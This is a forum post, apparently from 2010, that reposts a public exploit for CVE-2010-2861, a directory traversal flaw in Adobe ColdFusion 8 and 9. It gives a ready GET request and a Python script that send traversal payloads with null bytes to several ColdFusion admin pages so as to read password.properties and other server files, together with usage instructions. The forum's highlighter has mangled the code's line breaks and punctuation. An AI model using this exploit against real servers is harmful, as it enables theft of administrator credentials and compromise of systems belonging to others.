Показать сообщение отдельно
Старый 18.08.2010, 15:10   #8
asddas
 
Аватар для asddas
 
Регистрация: 04.08.2010
Сообщений: 153
Репутация: 161
По умолчанию

Vulnerable:
Adobe ColdFusion 8.0.1
Adobe ColdFusion 9.0.1
Adobe ColdFusion 9.0
Adobe ColdFusion 8.0

PHP код:
# Working GET request courtesy of carnal0wnage: 
# http://server/CFIDE/administrator/enter.cfm?locale=../../../../../../../../../../ColdFusion8/lib/password.properties%00en 

# LLsecurity added another admin page filename: "/CFIDE/administrator/enter.cfm" 
  
  
#!/usr/bin/python 
  
# CVE-2010-2861 - Adobe ColdFusion Unspecified Directory Traversal Vulnerability 
# detailed information about the exploitation of this vulnerability: 
# http://www.gnucitizen.org/blog/coldfusion-directory-traversal-faq-cve-2010-2861/ 
  
# leo 13.08.2010 
  
import sys 
import socket 
import re 
  
# in case some directories are blocked 
filenames = ("/CFIDE/wizards/common/_logintowizard.cfm""/CFIDE/administrator/archives/index.cfm""/cfide/install.cfm""/CFIDE/administrator/entman/index.cfm""/CFIDE/administrator/enter.cfm"
  
post """POST %s HTTP/1.1 
Host: %s 
Connection: close 
Content-Type: application/x-www-form-urlencoded 
Content-Length: %d 
  
locale=%%00%s%%00a"""
  
def main(): 
    if 
len(sys.argv) != 4
        print 
"usage: %s <host> <port> <file_path>" sys.argv[0
        print 
"example: %s localhost 80 ../../../../../../../lib/password.properties" sys.argv[0
        print 
"if successful, the file will be printed"
        
return
      
    
host sys.argv[1
    
port sys.argv[2
    
path sys.argv[3
  
    for 
f in filenames
        print 
"------------------------------"
        
print "trying"
  
        s 
socket.socket(socket.AF_INETsocket.SOCK_STREAM
        
s.connect((hostint(port))) 
        
s.send(post % (fhostlen(path) + 14path)) 
  
        
buf "" 
        
while 1
            
buf_s s.recv(1024
            if 
len(buf_s) == 0
                break
            
buf += buf_s 
         
        m 
re.search('<title>(.*)</title>'bufre.S
        if 
!= None
            
title m.groups(0)[0
            print 
"title from server in %s:" 
            
print "------------------------------"
            
print m.groups(0)[0
            print 
"------------------------------"
  
if __name__ == '__main__'
    
main() 
http://www.exploit-db.com/exploits/14641/
asddas вне форума   Ответить с цитированием